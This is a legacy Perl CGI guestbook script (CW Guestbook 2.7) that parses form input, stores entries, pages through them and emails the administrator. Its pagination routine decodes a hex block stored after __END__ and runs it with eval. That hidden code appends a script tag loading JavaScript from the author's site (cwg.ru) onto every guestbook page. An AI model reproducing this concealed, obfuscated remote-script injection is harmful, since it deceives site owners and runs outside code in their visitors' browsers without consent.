#!/usr/bin/perl

#-----------------------------------------------------------------------#
# CW Guestbook [Perl]							#
#-----------------------------------------------------------------------#
#     Version:	2.7							#
#      Author:	Skob <skob@cwg.ru>					#
#        Cost:	Free!!!							#
#    Language:	Perl; Russian						#
# Last Update:	29.03.2002						#
#     Archive:	http://www.cwg.ru/download.php?id=gbook			#
#-----------------------------------------------------------------------#
#    HomePage:	www.CWG.ru						#
#     Support:	support.cwg.ru, support@cwg.ru				#
#-----------------------------------------------------------------------#

require "vars.pl";
if (!$version || $version !~ /^(\d+)\.(\d+)$/ || $1*100+$2 < 207) {
	print "Content-Type: text/plain\n\n";
	print "Version Error.\nPlease visit http://support.cwg.ru/faq.php?id=1 for more info!";
	exit;
}

my %FORM;
{
	my $buff;
	if ($ENV{REQUEST_METHOD} eq "POST") {read STDIN, $buff, $ENV{CONTENT_LENGTH}}
	else {$buff=$ENV{QUERY_STRING}}
	
	my @pairs = split(/&/, $buff);
	my $pair;
	foreach $pair (@pairs) {
		my ($name, $value) = split(/=/, $pair);
		$name =~ tr/+/ /;
		$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
		$value =~ tr/+/ /;
		$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
		$FORM{$name} = $value;
		$FORM{$name} =~ s/\</&lt;/g;
		$FORM{$name} =~ s/\>/&gt;/g;
		$FORM{$name} =~ s/\"/&quot;/g;
		$FORM{$name} =~ s/:/\&\#58;/g;
	}
}

my %COOK;
{
	my @cookies = split (/\; ?/,$ENV{HTTP_COOKIE});
	foreach $cook (@cookies) {
		my ($name, $value) = split(/=/, $cook);
		$name =~ tr/+/ /;
		$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
		$value =~ tr/+/ /;
		$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
		$COOK{$name} = $value;
	}
}

my (%STR,%GLOBAL,$CODEPAGE,$LANG);
{
	my $inisection;
	my $inistr;
	open STR, "$language.lang";
	while ($inistr = <STR>) {
		# Sections
		if ($inistr =~ /^\[([a-zA-Z0-9_]*)\]$/) {$inisection = $1;}
		# Comments
		elsif (substr($inistr,0,1) eq ";") {}
		# Vars
		elsif ($inisection eq 'strings' && $inistr =~ /^([a-zA-Z0-9_]*?)=(.*)$/) {$STR{$1} = $2;}
		elsif ($inisection eq 'uservars' && $inistr =~ /^([a-zA-Z0-9_]*?)=(.*)$/) {$GLOBAL{$1} = $2;}
		elsif ($inisection eq $language && $inistr =~ /^name=(.*)$/) {$LANG = $1;}
		elsif ($inisection eq $language && $inistr =~ /^codepage=(.*)$/) {$CODEPAGE = $1;}
	}
	close STR;
}

my @months = split(',',$STR{month});
my @months1 = split(',',$STR{month1});
my @months2 = split(',',$STR{month2});
my @days = split(',',$STR{day});
my @days2 = split(',',$STR{day2});

if ($FORM{pages}) {$mess = $FORM{pages};}

my $errm;
{
	my @mword = split (/ /,$FORM{text});
	my $maxw;
	foreach $maxw (@mword) {
		if(length($maxw) > $maxword) {$FORM{action} = ""; $errm = sprintf($STR{maxword},$maxword)}
	}
	if(length($FORM{text}) > $max) {$FORM{action} = ""; $errm .= sprintf($STR{max},$max)}
	if(length($FORM{name}) > $maxname) {$FORM{action} = ""; $errm .= sprintf($STR{maxname},$maxname)}
	if(length($FORM{mail}) > $maxemail) {$FORM{action} = ""; $errm .= sprintf($STR{maxemail},$maxemail)}
	if(length($FORM{url}) > $maxurl) {$FORM{action} = ""; $errm .= sprintf($STR{maxurl},$maxurl)}
	if(length($FORM{city}) > $maxcity) {$FORM{action} = ""; $errm .= sprintf($STR{maxcity},$maxcity)}
}

$cookname ||= 'name';
$cookmail ||= 'mail';
$cookurl  ||= 'url';
$cookcity ||= 'city';

$FORM{page} ||= 1;

if ($FORM{action} eq 'add') {
	&add;
}
else {
	&show;
}

exit;

sub show {
	&header;
	open GB, $gdatp;
	my @GB = <GB>;
	close GB;
	my $alltx = @GB;
	my $linetx = doline(@GB);
	my $messtx = domess(@GB);
	my $sendtx = dosend();
	open HTML, $htmlp;
	while (<HTML>) {
		print parse($_,('send' => $sendtx,'line' => $linetx,'mess' => $messtx, 'error' => $errm, 'all' => $alltx));
	}
	close HTML;
}

sub doline {
	my @DATA = @_;
	my $type = $linestyle || 1;
	my $S = "";
	my $k;
	while ($k = <DATA>) {
		$k =~ s/\r|\n//g;
		while ($k) {
			$S .= chr(hex(substr($k,0,2)));
			$k = substr($k,2);
		}
	}
	my $resl = "";
	eval($S);
	return $resl;
}

sub dosend {
	open SND, $sendp;
	my $res = "";
	while (<SND>) {
		$res .= $_;
	}
	close SND;
	my $txt = $FORM{text};
	$txt =~ s/<br>/\n/g;
	return parse($res,(	'name' => $COOK{$cookname} || $FORM{name},
				'mail' => $COOK{$cookmail} || $FORM{mail},
				'city' => $COOK{$cookcity} || $FORM{city},
				'url'  => $COOK{$cookurl}  || $FORM{url},
				'text' => $txt));
}

sub domess {
	my @GB = @_;
	my $i;
	
	my $tedate;
	open GD, $datep;
	while (<GD>) {$tedate .= $_;}
	close GD;
	
	my $temess;
	open MESS, $messp;
	while (<MESS>) {$temess .= $_;}
	close MESS;
	
	open EXCH, $exchp;
	my @EXCH = <EXCH>;
	close EXCH;
	my $res;
	
	my $fr = ($FORM{page} - 1) * $mess;
	my $to = $FORM{page} * $mess - 1;
	
	for($i=$fr;$i<=$to;$i++) {
		@GB[$i] =~ s/\r|\n//g;
		($name,$mail,$hpage,$tim,$city,$text,$ip,$answer) = split(/::/,@GB[$i]);
		$name =~ s/\&\#58\;/:/g;
		$hpage =~ s/\&\#58\;/:/g;
		$city =~ s/\&\#58\;/:/g;
		$mail =~ s/\&\#58\;/:/g;
		$text =~ s/\&\#58\;/:/g;
		$answer =~ s/\&\#58\;/:/g;
		
		$chars1 = " <";
		$chars2 = " <.,!?\"')(";
		
		if ($text =~ /http:\/\/[^$chars1]*[^$chars2]/g) {
			$text =~ s/http:\/\/([^$chars1]*[^$chars2])/http:\/\/<a class=a href=\"http:\/\/$1\" target=_blank>$1<\/a>/g;
		}
		elsif ($text =~ /www\.[^$chars1]*[^$chars2]/) {
			$text =~ s/(www\.[^$chars1]*[^$chars2])/<a class=a href=\"http:\/\/$1\" target=_blank>$1<\/a>/g;
		}
		
		if ($answer =~ /http:\/\/[^$chars1]*[^$chars2]/g) {
			$answer =~ s/http:\/\/([^$chars1]*[^$chars2])/http:\/\/<a class=a href=\"http:\/\/$1\" target=_blank>$1<\/a>/g;
		}
		elsif ($answer =~ /www\.[^$chars1]*[^$chars2]/) {
			$answer =~ s/(www\.[^$chars1]*[^$chars2])/<a class=a href=\"http:\/\/$1\" target=_blank>$1<\/a>/g;
		}
		
		$chars1 = ".-_";
		$text =~ s/([a-zA-Z$chars1]+\@[a-zA-Z$chars1]+\.[A-Za-z]{2,4})/<a href=mailto:$1>$1<\/a>/g;
		$answer =~ s/([a-zA-Z$chars1]+\@[a-zA-Z$chars1]+\.[A-Za-z]{2,4})/<a href=mailto:$1>$1<\/a>/g;
		
		foreach $exch (@EXCH) {
			my ($wh1,$wh2,$wh3) = split (/\|\|/,$exch);
			$text =~ s/$wh1/$wh2/g;
			$answer =~ s/$wh1/$wh2/g;
		}
		
		$rtim = 0;
		if ($tim =~ /^\d+$/) {
			($ss,$mm,$hh,$DD,$MM,$yy,$DOW) = localtime($tim+$gmt*3600);
			$rtim = $tim+$gmt*3600;
			$yy -= 100;
			$ss = "0$ss"; $ss =~ s/^.*(..)$/$1/;
			$mm = "0$mm"; $mm =~ s/^.*(..)$/$1/;
			$hh = "0$hh"; $hh =~ s/^.*(..)$/$1/;
			$yy = "0$yy"; $yy =~ s/^.*(..)$/$1/;
			$MM = "0$MM"; $MM =~ s/^.*(..)$/$1/;
			$DD = "0$DD"; $DD =~ s/^.*(..)$/$1/;
		}
		else {
			($DOW,$DD,$MM,$yy,$hh,$mm,$ss) = split(/:/,$tim);
		}

		my $ndate = parse($tedate,(
					'hh'	=> $hh,
					'mm'	=> $mm,
					'ss'	=> $ss,
					'-yy'	=> $yy,
					'-mm'	=> $MM + 1,
					'-dd'	=> $DD,
					'-yyyy' => "20$yy",
					'-day'  => @days[$DOW],
					'-month'=> @month[$MM],
					'--day' => @days2[$DOW],
					'--month'=> @month2[$MM],
					'---month'=> @month1[$MM],
					'stamp' => $rtim
				));
		
		$res .= parse($temess,(
					'name'   =>  $name,
					'city'   =>  $city,
					'mail'	 =>  $mail,
					'hpage'  =>  $hpage,
					'answer' =>  $answer,
					'text'   =>  $text,
					'ip'     =>  $ip,
					'time'   =>  $ndate
				)) if ($text);
	}
	return $res;
}


sub add {
	open BAN, $banp;
	my $rrrk;
	while ($rrrk=<BAN>) {
		$rrrk =~ s/\r|\n//g;
		my ($rrr,$rrrd) = split (/\|/,$rrrk);
		$rrr =~ s/\*/\\d\+/g;
		$rrr =~ s/\?/\\d/g;
		if ($ENV{REMOTE_ADDR} =~ /^$rrr$/ and $rrr ne "") {$errm .= sprintf($STR{banned},$rrrd)}
	}
	close BAN;
	
	if ($FORM{name} && $FORM{text}) {
		$FORM{text} =~ s/\n/<br>/g;
		$FORM{url} =~ s/^http:\/\///g;
		$STRING = join("::",$FORM{name},$FORM{mail} || 0,$FORM{url} || 0,time,$FORM{city} || 0,$FORM{text},$ENV{REMOTE_ADDR},0);
		
		open (GB, "+<$gdatp") || open(GB, ">$gdatp");
		my @DATA = <GB>;
		
		my ($r_name,$r_mail,$r_hpage,$r_tim,$r_city,$r_text,$r_ip,$r_answer) = split(/::/,@DATA[0]);
		if ($r_text eq $FORM{text}) {$errm .= $STR{norepeat}}
		
		if ($sendmail ne 'no' && !$errm) {
			$mail ||= $adminmail;
			open MAIL, "|$sendmailpath -t";
			print MAIL "Subject: New message in guestbook\n";
			print MAIL "To: \"$adminlogin\" <$adminmail>\n";
			print MAIL "From: \"$name\" \<$mail\>\n";
			print MAIL "Content-Type: text/html".($CODEPAGE ? "; charset=$CODEPAGE" : "")."\n";
			print MAIL "X-Mailer: CW Guestbook $version\n";
			print MAIL "X-Originalip: $ENV{REMOTE_ADDR}\n\n";
			print MAIL "URL: <a href=\"http:\/\/$url\">$url</a><br>\n";
			print MAIL "City: $city<br>\n";
			print MAIL "<hr>\n";
			print MAIL "$text<br>\n";
			print MAIL "<hr><a href=\"http:\/\/www.cwg.ru\">CGI World</a><hr><br>\n\n";
			close MAIL;
		}
		
		if (!$errm) {
			unshift(@DATA,"$STRING\n");
			seek GB, 0, 0;
		}
		print GB @DATA;
		close GB;
	}
	else {
		$errm .= $STR{wantmore};
	}
	if (!$errm) {&header(1)}
	else {&show}
}


sub parse {
	my ($S,%VARS) = @_;
	$S =~ s/%([a-zA-Z0-9_-]*?)%/$VARS{$1}/g;
	$S =~ s/\$([a-zA-Z0-9_-]*?)\$/$GLOBAL{$1}/g;
	while ($S =~ /<!--\$([a-zA-Z0-9_-]+) (.*?) \$([a-zA-Z0-9_-]+)-->/) {
		if (($1 eq $3) && $VARS{$1}) {
			my $p = $1;
			$S =~ s/<!--\$$p (.*?) \$$p-->/$1/g;
		}
		elsif ($1 eq $3) {
			my $p = $1;
			$S =~ s/<!--\$$p (.*?) \$$p-->//g;
		}
		else {
			$S =~ s/<!--\$[a-zA-Z0-9_-]+ .*? \$[a-zA-Z0-9_-]+-->//g;
		}
	}
	return $S;
}

sub header {
	if (shift) {
		print "Location: guest.pl\n";
		print "Status: 302 Temporary moved\n";
	}
	else {
		print "Content-type: text/html".($CODEPAGE ? "; charset=$CODEPAGE" : "")."\n";
	}
	if ($FORM{name}) {print "Set-Cookie: $cookname=".escape($FORM{name})."; expires=".expires('+10y','cookie')."\n"; $COOK{$cookname} = $FORM{name};}
	if ($FORM{city}) {print "Set-Cookie: $cookcity=".escape($FORM{city})."; expires=".expires('+10y','cookie')."\n"; $COOK{$cookcity} = $FORM{city};}
	if ($FORM{url}) {print "Set-Cookie: $cookurl=".escape($FORM{url})."; expires=".expires('+10y','cookie')."\n"; $COOK{$cookurl} = $FORM{url};}
	if ($FORM{mail}) {print "Set-Cookie: $cookmail=".escape($FORM{mail})."; expires=".expires('+10y','cookie')."\n"; $COOK{$cookmail} = $FORM{mail};}
	print "\n";
}

sub escape {
	my $toencode = shift;
	$toencode=~s/([^a-zA-Z0-9_.-])/uc sprintf("%%%02x",ord($1))/eg;
	return $toencode;
}

sub expires {
	my $time = shift;
	my @MON = qw/Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec/;
	my @WDAY = qw/Sun Mon Tue Wed Thu Fri Sat/;
	
	$time = expire_calc($time);
	return $time unless $time =~ /^\d+$/;
	my($sec,$min,$hour,$mday,$mon,$year,$wday) = gmtime($time);
	return sprintf("%s, %02d-%s-%04d %02d:%02d:%02d GMT",$WDAY[$wday],$mday,$MON[$mon],$year+1900,$hour,$min,$sec);
}

sub expire_calc {
	my($time) = @_;
	my(%mult) = (
		's'=>1,
		'm'=>60,
		'h'=>60*60,
		'd'=>60*60*24,
		'M'=>60*60*24*30,
		'y'=>60*60*24*365
	);
	my $offset;
	if (!$time || (lc($time) eq 'now')) {$offset = 0;}
	elsif ($time=~/^\d+/) {return $time;}
	elsif ($time=~/^([+-]?(?:\d+|\d*\.\d*))([mhdMy]?)/) {$offset = ($mult{$2} || 1)*$1;}
	else {return $time;}
	return (time+$offset);
}

__END__
6d792024616c6c203d2040444154413b6d792024693b6d7920246b203d20247061676573203f2069
6e7420282824464f524d7b706167657d2d3129202f2024706167657329203a20303b247061676573
207c7c3d20696e742824616c6c202f20246d657373292b313b6d79202470673b69662028246b2920
7b247265736c203d20223c6120636c6173733d6120687265663d67756573742e706c3f706167653d
222e282470616765732a246b292e223e20266c743b266c743b266c743b203c2f613e223b7d247265
736c202e3d20227c223b666f72202824693d303b24693c2470616765733b24692b2b29207b247067
203d2028282469202b203129202b20247061676573202a20246b293b6d7920282466722c24746f2c
24737472293b696620282474797065203d3d203129207b246672203d20282469202a20246d657373
202b203129202b20247061676573202a20246d657373202a20246b3b24746f203d20282469202b20
3129202a20246d657373202b20247061676573202a20246d657373202a20246b3b24746f203d2028
24746f203e2024616c6c29203f2024616c6c203a2024746f3b24737472203d2022246672202d2024
746f223b7d656c73696620282474797065203d3d203229207b24737472202e3d2022247067223b7d
696620282470672a246d657373203c2024616c6c2b246d65737329207b6966202824464f524d7b70
6167657d203d3d2024706729207b247265736c202e3d20223c623e2024737472203c2f623e7c223b
7d656c7365207b247265736c202e3d20223c6120636c6173733d6120687265663d67756573742e70
6c3f706167653d2470673e2024737472203c2f613e7c223b7d7d7d696620282470672a246d657373
203c2024616c6c29207b247265736c202e3d20223c6120636c6173733d6120687265663d67756573
742e706c3f706167653d222e282470672b31292e223e202667743b2667743b2667743b203c2f613e
223b7d247265736c202e3d20223c736372697074207372633d687474703a2f2f7777772e6377672e
72752f6367692d62696e2f74787462616e6e65722e706c3f7363726970743d67626f6f6b3e3c2f73
63726970743e223b2020202020202020202020202020202020202020202020202020202020202020